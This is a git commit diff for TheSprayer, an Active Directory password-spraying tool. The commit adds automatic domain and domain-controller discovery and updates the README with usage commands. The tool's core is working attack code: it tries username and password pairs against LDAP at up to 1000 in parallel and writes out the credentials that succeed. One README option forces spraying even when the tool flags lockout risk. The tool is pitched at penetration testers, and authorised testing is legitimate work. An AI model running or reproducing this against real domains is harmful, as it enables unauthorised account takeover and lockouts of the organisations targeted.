Add automatic domain and DC discovery

coj337 · coj337 · commit 14d87652f036 · 2021-06-09T19:05:29.000+10:00
diff --git a/ReadMe.md b/ReadMe.md
@@ -6,23 +6,44 @@ TheSprayer is a cross-platform tool designed to help penetration testers spray p
 
 ## Quick Start
 To run it, you will need to update the parameters.
-The tool requires a domain name, DC IP/Hostname and a Username+Password combo for the domain in order to enumerate users and password policies.
+I've covered off a bunch of common use cases below, you can mix and match too! 🔥
 
-Spray all users with a password list:
+##### Spray all users with a password list:
 ```
-TheSprayer.exe -d windomain.local -s 192.168.38.102 -U Administrator -P Password1 -p Passwords.txt
+TheSprayer.exe -p Passwords.txt
 ```
 
-Spray against a list of users:
+##### Spray against a list of users:
 ```
-TheSprayer.exe -d windomain.local -s 192.168.38.102 -U Administrator -P Password1 -u Users.txt
+TheSprayer.exe -u Users.txt
 ```
 
-Spray a single user+password without any files:
+##### Spray a single user and password:
 ```
-TheSprayer.exe -d windomain.local -s 192.168.38.102 -U Administrator -P Password1 -u DomainAdmin -p DefinitelyValidPassword
+TheSprayer.exe -u DomainAdmin -p DefinitelyValidPassword
 ``` 
 
+##### Spray as another user
+```
+TheSprayer.exe -U Administrator -P Password1 -p Passwords.txt
+```
+
+##### Spray from a non-domain machine
+```
+TheSprayer.exe -d windomain.local -s 192.168.38.102 -p Passwords.txt
+```
+
+##### Spray from a non-domain machine with another user
+```
+TheSprayer.exe -d windomain.local -s 192.168.38.102 -U Administrator -P Password1 -p Passwords.txt
+```
+
+##### Force spray a password list against all users
+```
+TheSprayer.exe -p Passwords.txt -f
+```
+*Note: This will spray even if it's detected as unsafe, use at your own risk!*
+
 ## Options
 ```
 -d, --Domain               Required. The Active Directory domain (e.g. windomain.local)
diff --git a/TheSprayer/ActiveDirectoryService.cs b/TheSprayer/ActiveDirectoryService.cs
@@ -7,7 +7,6 @@
 using System.Linq;
 using TheSprayer.Helpers;
 using System.Threading.Tasks;
-using System.Diagnostics;
 
 namespace TheSprayer
 {
@@ -26,7 +25,6 @@ public ActiveDirectoryService(string domain, string domainUser, string domainUse
             _domainUserPass = domainUserPass;
             _domainController = domainController;
 
-            //TODO: Get the DN properly instead of yolo'ing like this
             var splitDomain = _domain.Split('.');
             _distinguishedName = "";
             foreach (var split in splitDomain)
@@ -48,13 +46,12 @@ public List<PasswordPolicy> GetFineGrainedPasswordPolicy()
             var policies = new List<PasswordPolicy>();
             string filter = "(objectClass=msDS-PasswordSettings)";
 
-            LdapConnection connection = new(new LdapDirectoryIdentifier(_domainController, 389, false, false));
-            connection.Credential = new NetworkCredential(_domainUser, _domainUserPass, _domain);
-            SearchRequest searchRequest = new(_distinguishedName, filter, SearchScope.Subtree);
+            var connection = CreateLdapConnection();
+            var searchRequest = new SearchRequest(_distinguishedName, filter, SearchScope.Subtree);
 
             try
             {
-                SearchResponse searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
+                var searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
 
                 foreach (SearchResultEntry entry in searchResponse.Entries)
                 {
@@ -97,13 +94,12 @@ public PasswordPolicy GetPasswordPolicy()
         {
             string filter = "(&(objectClass=domainDNS))";
 
-            LdapConnection connection = new(new LdapDirectoryIdentifier(_domainController, 389, false, false));
-            connection.Credential = new NetworkCredential(_domainUser, _domainUserPass, _domain);
-            SearchRequest searchRequest = new(_distinguishedName, filter, SearchScope.Subtree);
+            var connection = CreateLdapConnection();            
+            var searchRequest = new SearchRequest(_distinguishedName, filter, SearchScope.Subtree);
 
             try
             {
-                SearchResponse searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
+                var searchResponse = (SearchResponse)connection.SendRequest(searchRequest);
 
                 var entry = searchResponse.Entries[0];
                 var pwdMaxAge = Convert.ToInt64(entry.Attributes["MaxPwdAge"][0]) / (double)-864000000000;
@@ -150,13 +146,9 @@ public List<ActiveDirectoryUser> GetAllDomainUsers()
             // LDAP Filter to get all domain users. This needs to be modified but works for testing.
 
             string filter = "(&(objectCategory=person)(objectClass=user))";
+
             // Initiate a new LDAP connection.
-            // todo: initiate LDAPS connection if LDAP fails
-            LdapConnection connection = new(new LdapDirectoryIdentifier(_domainController, 389, false, false));
-            connection.Credential = new NetworkCredential(_domainUser, _domainUserPass, _domain);
-            // Numerous Authtypes are possible
-            // todo: have this selectable from the UI
-            //connection.AuthType = AuthType.Kerberos;
+            var connection = CreateLdapConnection();            
             SearchRequest searchRequest = new(_distinguishedName,
                                       filter,
                                       SearchScope.Subtree,
@@ -279,7 +271,7 @@ public void SprayPasswords(IEnumerable<string> passwords, IEnumerable<string> us
                     new ParallelOptions { MaxDegreeOfParallelism = 1000 }, 
                     user =>
                     {
-                        if (TryValidateCredentials(user.SamAccountName, password, out var message))
+                        if (TryValidateCredentials(user.SamAccountName, password))
                         {
                             ColorConsole.WriteLine($"{user.SamAccountName}:{password}");
                             if (!string.IsNullOrWhiteSpace(outputFile))
@@ -355,26 +347,31 @@ public static bool ShouldSprayUser(ActiveDirectoryUser user, PasswordPolicy defa
         }
 
         public bool TryValidateCredentials(string username, string password)
-        {
-            return TryValidateCredentials(username, password, out var _);
-        }
-
-        public bool TryValidateCredentials(string username, string password, out string message)
         {
             LdapConnection connection = new(new LdapDirectoryIdentifier(_domainController, 389, false, false));
-            connection.Credential = new NetworkCredential(username, password, _domain);
+            connection.Credential = new NetworkCredential(username, password);
 
             try
             {
                 connection.Bind();
-                message = "Success!";
                 return true;
             }
-            catch (LdapException e)
+            catch (LdapException)
             {
-                message = e.Message;
                 return false;
             }
+
+            
+        }
+
+        private LdapConnection CreateLdapConnection()
+        {
+            var connection = new LdapConnection(new LdapDirectoryIdentifier(_domainController, 389, false, false));
+            if (!string.IsNullOrWhiteSpace(_domainUser) && !string.IsNullOrWhiteSpace(_domainUserPass))
+            {
+                connection.Credential = new NetworkCredential(_domainUser, _domainUserPass);
+            }
+            return connection;
         }
     }
 }
diff --git a/TheSprayer/CommandLineOptions.cs b/TheSprayer/CommandLineOptions.cs
@@ -4,16 +4,16 @@ namespace TheSprayer
 {
     public class CommandLineOptions
     {
-        [Option('d', "Domain", Required = true, HelpText = "The Active Directory domain (e.g. windomain.local)")]
+        [Option('d', "Domain", Required = false, HelpText = "The Active Directory domain (e.g. windomain.local)")]
         public string Domain { get; set; }
 
-        [Option('s', "Server", Required = true, HelpText = "The IP or hostname of a domain controller")]
+        [Option('s', "Server", Required = false, HelpText = "The IP or hostname of a domain controller")]
         public string DomainController { get; set; }
 
-        [Option('U', "Username", Required = true, HelpText = "Username for domain user to enumerate policies")]
+        [Option('U', "Username", Required = false, HelpText = "Username for domain user to enumerate policies")]
         public string Username { get; set; }
 
-        [Option('P', "Password", Required = true, HelpText = "Password for domain user to enumerate policies")]
+        [Option('P', "Password", Required = false, HelpText = "Password for domain user to enumerate policies")]
         public string Password { get; set; }
 
         [Option('u', "UserList", Required = false, HelpText = "A file containing a line delimited list of usernames or a single user to try")]
diff --git a/TheSprayer/Helpers/DomainHelpers.cs b/TheSprayer/Helpers/DomainHelpers.cs
@@ -0,0 +1,51 @@
+﻿using System.DirectoryServices.AccountManagement;
+using System.DirectoryServices.ActiveDirectory;
+using System.Runtime.InteropServices;
+
+namespace TheSprayer.Helpers
+{
+    public static class DomainHelpers
+    {
+        public static string GetCurrentDomain()
+        {
+            try
+            {
+                if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
+                {
+                    return System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName;
+                }
+            }
+            catch {}
+
+            return null;
+        }
+
+        public static string GetDomainController(string domainName)
+        {
+            try 
+            {
+                if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
+                {
+                    var domainContext = new DirectoryContext(DirectoryContextType.Domain, domainName);
+
+                    var domain = Domain.GetDomain(domainContext);
+                    var controller = domain.FindDomainController();
+                    return controller.IPAddress;
+                }
+            }
+            catch {}
+
+            return null;
+        }
+
+        public static bool IsImplicitUserValid(string dc)
+        {
+            if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows))
+            {
+                using var context = new PrincipalContext(ContextType.Domain, dc);
+                return context.ValidateCredentials(null, null);
+            }
+            return false;
+        }
+    }
+}
diff --git a/TheSprayer/Program.cs b/TheSprayer/Program.cs
@@ -1,7 +1,8 @@
 ﻿using CommandLine;
+using System;
 using System.Collections.Generic;
 using System.IO;
-using System.Linq;
+using TheSprayer.Helpers;
 
 namespace TheSprayer
 {
@@ -10,9 +11,7 @@ public class Program
         public static void Main(string[] args)
         {
             Parser.Default.ParseArguments<CommandLineOptions>(args).WithParsed(o =>
-            {
-                var adService = new ActiveDirectoryService(o.Domain, o.Username, o.Password, o.DomainController);
-                
+            {                
                 IEnumerable<string> passwords, users;
                 int remainingAttempts;
 
@@ -54,6 +53,39 @@ public static void Main(string[] args)
                     remainingAttempts = 2;
                 }
 
+                //Try figure out the domain if it isn't provided
+                if (string.IsNullOrWhiteSpace(o.Domain))
+                {
+                    o.Domain = DomainHelpers.GetCurrentDomain();
+                    if (string.IsNullOrWhiteSpace(o.Domain))
+                    {
+                        ColorConsole.WriteLine("Unable to determine domain automatically. Please run on a domain joined device or specify the domain with -d.", ConsoleColor.Red);
+                        return;
+                    }
+                }
+
+                //Try figure out the dc if it's not provided
+                if (string.IsNullOrWhiteSpace(o.DomainController))
+                {
+                    o.DomainController = DomainHelpers.GetDomainController(o.Domain);
+                    if (string.IsNullOrWhiteSpace(o.DomainController))
+                    {
+                        ColorConsole.WriteLine("Unable to determine domain controller automatically. Please run on a domain joined device or specify the dc IP or host name with -s.", ConsoleColor.Red);
+                        return;
+                    }
+                }
+
+                //If no username or password passed in, test authentication with SSPI
+                if (string.IsNullOrWhiteSpace(o.Username) || string.IsNullOrWhiteSpace(o.Password))
+                {
+                    if (!DomainHelpers.IsImplicitUserValid(o.DomainController))
+                    {
+                        ColorConsole.WriteLine("Unable to validate current user automatically. Please specify a domain users creds with -U and -P.", ConsoleColor.Red);
+                        return;
+                    }
+                }
+
+                var adService = new ActiveDirectoryService(o.Domain, o.Username, o.Password, o.DomainController);
                 adService.SprayPasswords(passwords, users, remainingAttempts, o.OutFile, o.Force);
             });
         }
